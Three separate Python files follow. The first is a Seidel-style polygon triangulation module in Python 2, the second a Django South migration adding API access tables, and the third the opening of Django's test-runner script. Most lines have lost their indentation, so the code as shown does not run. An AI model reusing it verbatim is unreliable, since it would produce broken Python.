# used to endorse or promote products derived from self software without specific
# prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
from random import shuffle
from math import atan2, sqrt
##
## Based on Raimund Seidel's paper "A simple and fast incremental randomized
## algorithm for computing trapezoidal decompositions and for triangulating polygons"
## (Ported from poly2tri)
##
# Shear transform. May affect numerical robustness
SHEAR = 1e-3
class Point(object):
def __init__(self, x, y):
self.x = x
self.y = y
self.next, self.prev = None, None
def __str__(self):
return "Point( %s , %s )" %(self.x,self.y)
def __sub__(self, other):
if isinstance(other, Point):
return Point(self.x - other.x, self.y - other.y)
else:
return Point(self.x - other, self.y - other)
def __add__(self, other):
if isinstance(other, Point):
return Point(self.x + other.x, self.y + other.y)
else:
return Point(self.x + other, self.y + other)
def __mul__(self, f):
return Point(self.x * f, self.y * f)
def __div__(self, a):
return Point(self.x / a, self.y / a)
def cross(self, p):
return self.x * p.y - self.y * p.x
def dot(self, p):
return self.x * p.x + self.y * p.y
def length(self):
return sqrt(self.x * self.x + self.y * self.y)
def normalize(self):
return self / self.length()
def less(self, p):
return self.x < p.x
def neq(self, other):
return other.x != self.x or other.y != self.y
def clone(self):
return Point(self.x, self.y)
def orient2d(pa, pb, pc):
    acx = pa.x - pc.x
    bcx = pb.x - pc.x
    acy = pa.y - pc.y
    bcy = pb.y - pc.y
    return acx * bcy - acy * bcx
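# orient2d returns twice the signed area of triangle (pa, pb, pc): positive
# when the points are in counterclockwise order, negative when clockwise,
# and zero when the three points are collinear.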
class Edge(object):
def __init__(self, p, q):
self.p = p
self.q = q
self.slope = (q.y - p.y) / (q.x - p.x) if q.x - p.x != 0 else 0
self.b = p.y - (p.x * self.slope)
self.above, self.below = None, None
self.mpoints = [p, q]
def __str__(self):
return "Edge( %s , %s )" %(self.p,self.q)
def is_above(self, point):
return orient2d(self.p, self.q, point) < 0
def is_below(self, point):
return orient2d(self.p, self.q, point) > 0
def add_mpoint(self, point):
for mp in self.mpoints:
if not mp.neq(point): return
self.mpoints.append(point)
class Trapezoid(object):
def __init__(self, left_point, right_point, top, bottom):
self.left_point = left_point
self.right_point = right_point
self.top = top
self.bottom = bottom
self.upper_left = None
self.upper_right = None
self.lower_left = None
self.lower_right = None
self.inside = True
self.sink = None
self.key = hash(self)
def update_left(self, ul, ll):
self.upper_left = ul
if ul != None: ul.upper_right = self
self.lower_left = ll
if ll != None: ll.lower_right = self
def update_right(self, ur, lr):
self.upper_right = ur
if ur != None: ur.upper_left = self
self.lower_right = lr
if lr != None: lr.lower_left = self
def update_left_right(self, ul, ll, ur, lr):
self.upper_left = ul
if ul != None: ul.upper_right = self
self.lower_left = ll
if ll != None: ll.lower_right = self
self.upper_right = ur
if ur != None: ur.upper_left = self
self.lower_right = lr
if lr != None: lr.lower_left = self
def trim_neighbors(self):
if self.inside:
self.inside = False
if self.upper_left != None: self.upper_left.trim_neighbors()
if self.lower_left != None: self.lower_left.trim_neighbors()
if self.upper_right != None: self.upper_right.trim_neighbors()
if self.lower_right != None: self.lower_right.trim_neighbors()
def contains(self, point):
return (point.x > self.left_point.x and point.x < self.right_point.x and
self.top.is_above(point) and self.bottom.is_below(point))
def vertices(self):
v1 = line_intersect(self.top, self.left_point.x)
v2 = line_intersect(self.bottom, self.left_point.x)
v3 = line_intersect(self.bottom, self.right_point.x)
v4 = line_intersect(self.top, self.right_point.x)
return v1, v2, v3, v4
def add_points(self):
if self.left_point is not self.bottom.p:
self.bottom.add_mpoint(self.left_point)
if self.right_point is not self.bottom.q:
self.bottom.add_mpoint(self.right_point)
if self.left_point is not self.top.p:
self.top.add_mpoint(self.left_point)
if self.right_point is not self.top.q:
self.top.add_mpoint(self.right_point)
def area(self):
p = list(self.vertices())
x0 = p[0][0]; y0 = p[0][1]
x1 = p[1][0]; y1 = p[1][1]
return 0.5 * abs(sum(x0*y1 - x1*y0
for ((x0, y0), (x1, y1)) in self.segments(p)))
def segments(self, p):
return zip(p, p[1:] + [p[0]])
def line_intersect(edge, x):
y = edge.slope * x + edge.b
return x, y
class Triangulator(object):
##
## Number of points should be > 3
##
def __init__(self, poly_line):
self.polygons = []
self.trapezoids = []
self.xmono_poly = []
self.edge_list = self.init_edges(poly_line)
self.trapezoidal_map = TrapezoidalMap()
self.bounding_box = self.trapezoidal_map.bounding_box(self.edge_list)
self.query_graph = QueryGraph(isink(self.bounding_box))
self.process()
def triangles(self):
triangles = []
for p in self.polygons:
verts = []
for v in p:
verts.append((v.x, v.y))
triangles.append(verts)
return triangles
def trapezoid_map(self):
return self.trapezoidal_map.map
# Build the trapezoidal map and query graph
def process(self):
for edge in self.edge_list:
traps = self.query_graph.follow_edge(edge)
for t in traps:
                # Remove old trapezoids
del self.trapezoidal_map.map[t.key]
# Bisect old trapezoids and create new
cp = t.contains(edge.p)
cq = t.contains(edge.q)
if cp and cq:
tlist = self.trapezoidal_map.case1(t, edge)
self.query_graph.case1(t.sink, edge, tlist)
elif cp and not cq:
tlist = self.trapezoidal_map.case2(t, edge)
self.query_graph.case2(t.sink, edge, tlist)
elif not cp and not cq:
tlist = self.trapezoidal_map.case3(t, edge)
self.query_graph.case3(t.sink, edge, tlist)
else:
tlist = self.trapezoidal_map.case4(t, edge)
self.query_graph.case4(t.sink, edge, tlist)
# Add new trapezoids to map
for t in tlist:
self.trapezoidal_map.map[t.key] = t
self.trapezoidal_map.clear()
# Mark outside trapezoids w/ depth-first search
for k, t in self.trapezoidal_map.map.items():
self.mark_outside(t)
# Collect interior trapezoids
for k, t in self.trapezoidal_map.map.items():
if t.inside:
self.trapezoids.append(t)
t.add_points()
# Generate the triangles
self.create_mountains()
def mono_polies(self):
polies = []
for x in self.xmono_poly:
polies.append(x.monoPoly)
return polies
def create_mountains(self):
for edge in self.edge_list:
if len(edge.mpoints) > 2:
mountain = MonotoneMountain()
points = merge_sort(edge.mpoints)
for p in points:
mountain.add(p)
mountain.process()
for t in mountain.triangles:
self.polygons.append(t)
self.xmono_poly.append(mountain)
def mark_outside(self, t):
if t.top is self.bounding_box.top or t.bottom is self.bounding_box.bottom:
t.trim_neighbors()
def init_edges(self, points):
edge_list = []
size = len(points)
for i in range(size):
j = i + 1 if i < size-1 else 0
p = points[i][0], points[i][1]
q = points[j][0], points[j][1]
edge_list.append((p, q))
return self.order_edges(edge_list)
def order_edges(self, edge_list):
edges = []
for e in edge_list:
p = shear_transform(e[0])
q = shear_transform(e[1])
if p.x > q.x:
edges.append(Edge(q, p))
else:
edges.append(Edge(p, q))
# Randomized incremental algorithm
shuffle(edges)
return edges
def shear_transform(point):
return Point(point[0] + SHEAR * point[1], point[1])
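# The tiny shear (x + SHEAR * y, y) applied before ordering edges makes it
# unlikely that two distinct vertices share the same x-coordinate, avoiding
# degenerate vertical edges in the trapezoidal decomposition.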
def merge_sort(l):
if len(l)>1 :
lleft = merge_sort(l[:len(l)/2])
lright = merge_sort(l[len(l)/2:])
p1, p2, p = 0, 0, 0
while p1<len(lleft) and p2<len(lright):
if lleft[p1].x < lright[p2].x:
l[p]=lleft[p1]
p+=1
p1+=1
else:
l[p]=lright[p2]
p+=1
p2+=1
if p1<len(lleft):l[p:]=lleft[p1:]
elif p2<len(lright):l[p:]=lright[p2:]
else : print "internal error"
return l
class TrapezoidalMap(object):
def __init__(self):
self.map = {}
self.margin = 50.0
self.bcross = None
self.tcross = None
def clear(self):
self.bcross = None
self.tcross = None
def case1(self, t, e):
trapezoids = []
trapezoids.append(Trapezoid(t.left_point, e.p, t.top, t.bottom))
trapezoids.append(Trapezoid(e.p, e.q, t.top, e))
trapezoids.append(Trapezoid(e.p, e.q, e, t.bottom))
trapezoids.append(Trapezoid(e.q, t.right_point, t.top, t.bottom))
trapezoids[0].update_left(t.upper_left, t.lower_left)
trapezoids[1].update_left_right(trapezoids[0], None, trapezoids[3], None)
trapezoids[2].update_left_right(None, trapezoids[0], None, trapezoids[3])
trapezoids[3].update_right(t.upper_right, t.lower_right)
return trapezoids
def case2(self, t, e):
rp = e.q if e.q.x == t.right_point.x else t.right_point
trapezoids = []
trapezoids.append(Trapezoid(t.left_point, e.p, t.top, t.bottom))
trapezoids.append(Trapezoid(e.p, rp, t.top, e))
trapezoids.append(Trapezoid(e.p, rp, e, t.bottom))
trapezoids[0].update_left(t.upper_left, t.lower_left)
trapezoids[1].update_left_right(trapezoids[0], None, t.upper_right, None)
trapezoids[2].update_left_right(None, trapezoids[0], None, t.lower_right)
self.bcross = t.bottom
self.tcross = t.top
e.above = trapezoids[1]
e.below = trapezoids[2]
return trapezoids
def case3(self, t, e):
lp = e.p if e.p.x == t.left_point.x else t.left_point
rp = e.q if e.q.x == t.right_point.x else t.right_point
trapezoids = []
if self.tcross is t.top:
trapezoids.append(t.upper_left)
trapezoids[0].update_right(t.upper_right, None)
trapezoids[0].right_point = rp
else:
trapezoids.append(Trapezoid(lp, rp, t.top, e))
trapezoids[0].update_left_right(t.upper_left, e.above, t.upper_right, None)
if self.bcross is t.bottom:
trapezoids.append(t.lower_left)
trapezoids[1].update_right(None, t.lower_right)
trapezoids[1].right_point = rp
else:
trapezoids.append(Trapezoid(lp, rp, e, t.bottom))
trapezoids[1].update_left_right(e.below, t.lower_left, None, t.lower_right)
self.bcross = t.bottom
self.tcross = t.top
e.above = trapezoids[0]
e.below = trapezoids[1]
return trapezoids
def case4(self, t, e):
lp = e.p if e.p.x == t.left_point.x else t.left_point
trapezoids = []
if self.tcross is t.top:
trapezoids.append(t.upper_left)
trapezoids[0].right_point = e.q
else:
trapezoids.append(Trapezoid(lp, e.q, t.top, e))
trapezoids[0].update_left(t.upper_left, e.above)
if self.bcross is t.bottom:
trapezoids.append(t.lower_left)
trapezoids[1].right_point = e.q
else:
trapezoids.append(Trapezoid(lp, e.q, e, t.bottom))
trapezoids[1].update_left(e.below, t.lower_left)
trapezoids.append(Trapezoid(e.q, t.right_point, t.top, t.bottom))
trapezoids[2].update_left_right(trapezoids[0], trapezoids[1], t.upper_right, t.lower_right)
return trapezoids
def bounding_box(self, edges):
margin = self.margin
max = edges[0].p + margin
min = edges[0].q - margin
for e in edges:
if e.p.x > max.x: max = Point(e.p.x + margin, max.y)
if e.p.y > max.y: max = Point(max.x, e.p.y + margin)
if e.q.x > max.x: max = Point(e.q.x + margin, max.y)
if e.q.y > max.y: max = Point(max.x, e.q.y + margin)
if e.p.x < min.x: min = Point(e.p.x - margin, min.y)
if e.p.y < min.y: min = Point(min.x, e.p.y - margin)
if e.q.x < min.x: min = Point(e.q.x - margin, min.y)
if e.q.y < min.y: min = Point(min.x, e.q.y - margin)
top = Edge(Point(min.x, max.y), Point(max.x, max.y))
bottom = Edge(Point(min.x, min.y), Point(max.x, min.y))
left = top.p
right = top.q
trap = Trapezoid(left, right, top, bottom)
self.map[trap.key] = trap
return trap
class Node(object):
def __init__(self, lchild, rchild):
self.parent_list = []
self.lchild = lchild
self.rchild = rchild
if lchild != None:
lchild.parent_list.append(self)
if rchild != None:
rchild.parent_list.append(self)
def replace(self, node):
for parent in node.parent_list:
if parent.lchild is node:
parent.lchild = self
else:
parent.rchild = self
self.parent_list += node.parent_list
class Sink(Node):
def __init__(self, trapezoid):
super(Sink, self).__init__(None, None)
self.trapezoid = trapezoid
trapezoid.sink = self
def locate(self, edge):
return self
def isink(trapezoid):
if trapezoid.sink is None:
return Sink(trapezoid)
return trapezoid.sink
class XNode(Node):
def __init__(self, point, lchild, rchild):
super(XNode, self).__init__(lchild, rchild)
self.point = point
def locate(self, edge):
if edge.p.x >= self.point.x:
return self.rchild.locate(edge)
return self.lchild.locate(edge)
class YNode(Node):
def __init__(self, edge, lchild, rchild):
super(YNode, self).__init__(lchild, rchild)
self.edge = edge
def locate(self, edge):
if self.edge.is_above(edge.p):
return self.rchild.locate(edge)
if self.edge.is_below(edge.p):
return self.lchild.locate(edge)
if edge.slope < self.edge.slope:
return self.rchild.locate(edge)
return self.lchild.locate(edge)
class QueryGraph:
def __init__(self, head):
self.head = head
def locate(self, edge):
return self.head.locate(edge).trapezoid
def follow_edge(self, edge):
trapezoids = [self.locate(edge)]
while(edge.q.x > trapezoids[-1].right_point.x):
if edge.is_above(trapezoids[-1].right_point):
trapezoids.append(trapezoids[-1].upper_right)
else:
trapezoids.append(trapezoids[-1].lower_right)
return trapezoids
def replace(self, sink, node):
if sink.parent_list:
node.replace(sink)
else:
self.head = node
def case1(self, sink, edge, tlist):
yNode = YNode(edge, isink(tlist[1]), isink(tlist[2]))
qNode = XNode(edge.q, yNode, isink(tlist[3]))
pNode = XNode(edge.p, isink(tlist[0]), qNode)
self.replace(sink, pNode)
def case2(self, sink, edge, tlist):
yNode = YNode(edge, isink(tlist[1]), isink(tlist[2]))
pNode = XNode(edge.p, isink(tlist[0]), yNode)
self.replace(sink, pNode)
def case3(self, sink, edge, tlist):
yNode = YNode(edge, isink(tlist[0]), isink(tlist[1]))
self.replace(sink, yNode)
def case4(self, sink, edge, tlist):
yNode = YNode(edge, isink(tlist[0]), isink(tlist[1]))
qNode = XNode(edge.q, yNode, isink(tlist[2]))
self.replace(sink, qNode)
PI_SLOP = 3.1
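# Vertices whose interior angle has magnitude >= PI_SLOP (i.e. is nearly pi)
# are treated as lying on a straight line and are dropped in
# MonotoneMountain.process().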
class MonotoneMountain:
def __init__(self):
self.size = 0
self.tail = None
self.head = None
self.positive = False
self.convex_points = set()
self.mono_poly = []
self.triangles = []
self.convex_polies = []
def add(self, point):
        if self.size == 0:
self.head = point
self.size = 1
        elif self.size == 1:
self.tail = point
self.tail.prev = self.head
self.head.next = self.tail
self.size = 2
else:
self.tail.next = point
point.prev = self.tail
self.tail = point
self.size += 1
def remove(self, point):
next = point.next
prev = point.prev
point.prev.next = next
point.next.prev = prev
self.size -= 1
def process(self):
self.positive = self.angle_sign()
self.gen_mono_poly()
p = self.head.next
while p.neq(self.tail):
a = self.angle(p)
if a >= PI_SLOP or a <= -PI_SLOP or a == 0:
self.remove(p)
elif self.is_convex(p):
self.convex_points.add(p)
p = p.next
self.triangulate()
def triangulate(self):
while self.convex_points:
ear = self.convex_points.pop()
a = ear.prev
b = ear
c = ear.next
triangle = (a, b, c)
self.triangles.append(triangle)
self.remove(ear)
if self.valid(a):
self.convex_points.add(a)
if self.valid(c):
self.convex_points.add(c)
#assert self.size <= 3, "Triangulation bug, please report"
def valid(self, p):
return p.neq(self.head) and p.neq(self.tail) and self.is_convex(p)
def gen_mono_poly(self):
p = self.head
while(p != None):
self.mono_poly.append(p)
p = p.next
def angle(self, p):
a = p.next - p
b = p.prev - p
return atan2(a.cross(b), a.dot(b))
def angle_sign(self):
a = self.head.next - self.head
b = self.tail - self.head
return atan2(a.cross(b), a.dot(b)) >= 0
def is_convex(self, p):
if self.positive != (self.angle(p) >= 0):
return False
return True
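# Minimal usage sketch (an assumption about how this module is driven, not part
# of the original port): Triangulator takes a closed polygon as a list of
# (x, y) tuples, and triangles() returns the resulting triangles as lists of
# vertex coordinates.
if __name__ == "__main__":
    square = [(0.0, 0.0), (10.0, 0.0), (10.0, 10.0), (0.0, 10.0)]
    for tri in Triangulator(square).triangles():
        print(tri)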
|
|
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Deleting model 'APICachedDocument'
db.delete_table('API_apicacheddocument')
# Adding model 'APIAccessGroup'
db.create_table('API_apiaccessgroup', (
('group_id', self.gf('django.db.models.fields.IntegerField')(primary_key=True)),
('group_name', self.gf('django.db.models.fields.CharField')(max_length=255)),
('group_description', self.gf('django.db.models.fields.TextField')(null=True, blank=True)),
))
db.send_create_signal('API', ['APIAccessGroup'])
# Adding model 'APIAccessType'
db.create_table('API_apiaccesstype', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('call_type', self.gf('django.db.models.fields.IntegerField')()),
('call_name', self.gf('django.db.models.fields.CharField')(max_length=255)),
('call_description', self.gf('django.db.models.fields.TextField')(null=True, blank=True)),
('call_group', self.gf('django.db.models.fields.related.ForeignKey')(related_name='calls', to=orm['API.APIAccessGroup'])),
('call_mask', self.gf('django.db.models.fields.IntegerField')()),
))
db.send_create_signal('API', ['APIAccessType'])
# Adding model 'APIAccessRequirement'
db.create_table('API_apiaccessrequirement', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('requirement', self.gf('django.db.models.fields.related.ForeignKey')(related_name='required_by', to=orm['API.APIAccessType'])),
))
db.send_create_signal('API', ['APIAccessRequirement'])
# Adding M2M table for field corps_required on 'APIAccessRequirement'
db.create_table('API_apiaccessrequirement_corps_required', (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('apiaccessrequirement', models.ForeignKey(orm['API.apiaccessrequirement'], null=False)),
('corporation', models.ForeignKey(orm['core.corporation'], null=False))
))
db.create_unique('API_apiaccessrequirement_corps_required', ['apiaccessrequirement_id', 'corporation_id'])
# Adding M2M table for field groups_required on 'APIAccessRequirement'
db.create_table('API_apiaccessrequirement_groups_required', (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('apiaccessrequirement', models.ForeignKey(orm['API.apiaccessrequirement'], null=False)),
('group', models.ForeignKey(orm['auth.group'], null=False))
))
db.create_unique('API_apiaccessrequirement_groups_required', ['apiaccessrequirement_id', 'group_id'])
# Adding field 'CorpAPIKey.character_name'
db.add_column('API_corpapikey', 'character_name',
self.gf('django.db.models.fields.CharField')(max_length=255, null=True, blank=True),
keep_default=False)
# Adding field 'APIKey.access_mask'
db.add_column('API_apikey', 'access_mask',
self.gf('django.db.models.fields.IntegerField')(default=0),
keep_default=False)
# Adding field 'APIKey.validation_error'
db.add_column('API_apikey', 'validation_error',
self.gf('django.db.models.fields.CharField')(max_length=255, null=True, blank=True),
keep_default=False)
def backwards(self, orm):
# Adding model 'APICachedDocument'
db.create_table('API_apicacheddocument', (
('xml', self.gf('django.db.models.fields.TextField')()),
('cacheduntil', self.gf('django.db.models.fields.DateTimeField')()),
('host', self.gf('django.db.models.fields.CharField')(max_length=100)),
('params', self.gf('django.db.models.fields.CharField')(max_length=200)),
('path', self.gf('django.db.models.fields.CharField')(max_length=100)),
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
))
db.send_create_signal('API', ['APICachedDocument'])
# Deleting model 'APIAccessGroup'
db.delete_table('API_apiaccessgroup')
# Deleting model 'APIAccessType'
db.delete_table('API_apiaccesstype')
# Deleting model 'APIAccessRequirement'
db.delete_table('API_apiaccessrequirement')
# Removing M2M table for field corps_required on 'APIAccessRequirement'
db.delete_table('API_apiaccessrequirement_corps_required')
# Removing M2M table for field groups_required on 'APIAccessRequirement'
db.delete_table('API_apiaccessrequirement_groups_required')
# Deleting field 'CorpAPIKey.character_name'
db.delete_column('API_corpapikey', 'character_name')
# Deleting field 'APIKey.access_mask'
db.delete_column('API_apikey', 'access_mask')
# Deleting field 'APIKey.validation_error'
db.delete_column('API_apikey', 'validation_error')
models = {
'API.apiaccessgroup': {
'Meta': {'object_name': 'APIAccessGroup'},
'group_description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'group_id': ('django.db.models.fields.IntegerField', [], {'primary_key': 'True'}),
'group_name': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
'API.apiaccessrequirement': {
'Meta': {'object_name': 'APIAccessRequirement'},
'corps_required': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'api_requirements'", 'null': 'True', 'to': "orm['core.Corporation']"}),
'groups_required': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'api_requirements'", 'null': 'True', 'to': "orm['auth.Group']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'requirement': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'required_by'", 'to': "orm['API.APIAccessType']"})
},
'API.apiaccesstype': {
'Meta': {'object_name': 'APIAccessType'},
'call_description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'call_group': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'calls'", 'to': "orm['API.APIAccessGroup']"}),
'call_mask': ('django.db.models.fields.IntegerField', [], {}),
'call_name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'call_type': ('django.db.models.fields.IntegerField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
'API.apicharacter': {
'Meta': {'object_name': 'APICharacter'},
'alliance': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'apikey': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'characters'", 'to': "orm['API.APIKey']"}),
'charid': ('django.db.models.fields.BigIntegerField', [], {}),
'corp': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'lastshipname': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'lastshiptype': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'location': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'visible': ('django.db.models.fields.BooleanField', [], {'default': 'False'})
},
'API.apikey': {
'Meta': {'object_name': 'APIKey'},
'access_mask': ('django.db.models.fields.IntegerField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'keyid': ('django.db.models.fields.IntegerField', [], {}),
'lastvalidated': ('django.db.models.fields.DateTimeField', [], {}),
'proxykey': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'valid': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'validation_error': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'vcode': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'API.apishiplog': {
'Meta': {'object_name': 'APIShipLog'},
'character': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'shiplogs'", 'to': "orm['API.APICharacter']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'location': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'shipname': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'shiptype': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'timestamp': ('django.db.models.fields.DateTimeField', [], {})
},
'API.corpapikey': {
'Meta': {'object_name': 'CorpAPIKey', '_ormbases': ['API.APIKey']},
'apikey_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['API.APIKey']", 'unique': 'True', 'primary_key': 'True'}),
'character_name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'corp': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'api_keys'", 'to': "orm['core.Corporation']"})
},
'API.memberapikey': {
'Meta': {'object_name': 'MemberAPIKey', '_ormbases': ['API.APIKey']},
'apikey_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['API.APIKey']", 'unique': 'True', 'primary_key': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'api_keys'", 'to': "orm['auth.User']"})
},
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'core.alliance': {
'Meta': {'object_name': 'Alliance'},
'executor': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'+'", 'null': 'True', 'to': "orm['core.Corporation']"}),
'id': ('django.db.models.fields.BigIntegerField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'shortname': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'core.corporation': {
'Meta': {'object_name': 'Corporation'},
'alliance': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'member_corps'", 'null': 'True', 'to': "orm['core.Alliance']"}),
'id': ('django.db.models.fields.BigIntegerField', [], {'primary_key': 'True'}),
'member_count': ('django.db.models.fields.IntegerField', [], {}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'ticker': ('django.db.models.fields.CharField', [], {'max_length': '100'})
}
}
complete_apps = ['API']
|
|
#!/usr/bin/env python
from __future__ import division
import os
import sys
base_path = os.path.dirname(os.path.dirname(__file__))
if base_path not in sys.path[:1]:
    sys.path.insert(0, base_path)
import logging
import shutil
import subprocess
import tempfile
import warnings
import django
from django import contrib
from django.utils.deprecation import RemovedInDjango18Warning, RemovedInDjango19Warning
from django.utils._os import upath
from django.utils import six
warnings.simplefilter("default", RemovedInDjango19Warning)
warnings.simplefilter("default", RemovedInDjango18Warning)
CONTRIB_MODULE_PATH = 'django.contrib'
TEST_TEMPLATE_DIR = 'templates'
CONTRIB_DIR = os.path.dirname(upath(contrib.__file__))
RUNTESTS_DIR = os.path.abspath(os.path.dirname(upath(__file__)))
TEMP_DIR = tempfile.mkdtemp(prefix='django_')
os.environ['DJANGO_TEST_TEMP_DIR'] = TEMP_DIR
SUBDIRS_TO_SKIP = [
'data',
'test_discovery_sample',
'test_discovery_sample2',
'test_runner_deprecation_app',
'test_runner_invalid_app',
]
ALWAYS_INSTALLED_APPS = [
'django.contrib.contenttypes',
'django.contrib.auth',
'django.contrib.sites',
'django.contrib.flatpages',
'django.contrib.redirects',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.comments',
'django.contrib.admin.apps.SimpleAdminConfig',
'django.contrib.admindocs',
'django.contrib.staticfiles',
'django.contrib.humanize',
'staticfiles_tests',
'staticfiles_tests.apps.test',
'staticfiles_tests.apps.no_label',
'servers.another_app',
]
ALWAYS_MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
)
def get_test_modules():
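    # Discover candidate test packages both in the runtests directory and
    # under django.contrib, skipping plain files, 'sql*' directories,
    # SUBDIRS_TO_SKIP entries and anything without an __init__.py.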
modules = []
discovery_paths = [
(None, RUNTESTS_DIR),
(CONTRIB_MODULE_PATH, CONTRIB_DIR)
]
for modpath, dirpath in discovery_paths:
for f in os.listdir(dirpath):
if ('.' in f or
f.startswith('sql') or
os.path.basename(f) in SUBDIRS_TO_SKIP or
os.path.isfile(f) or
not os.path.exists(os.path.join(dirpath, f, '__init__.py'))):
continue
modules.append((modpath, f))
return modules
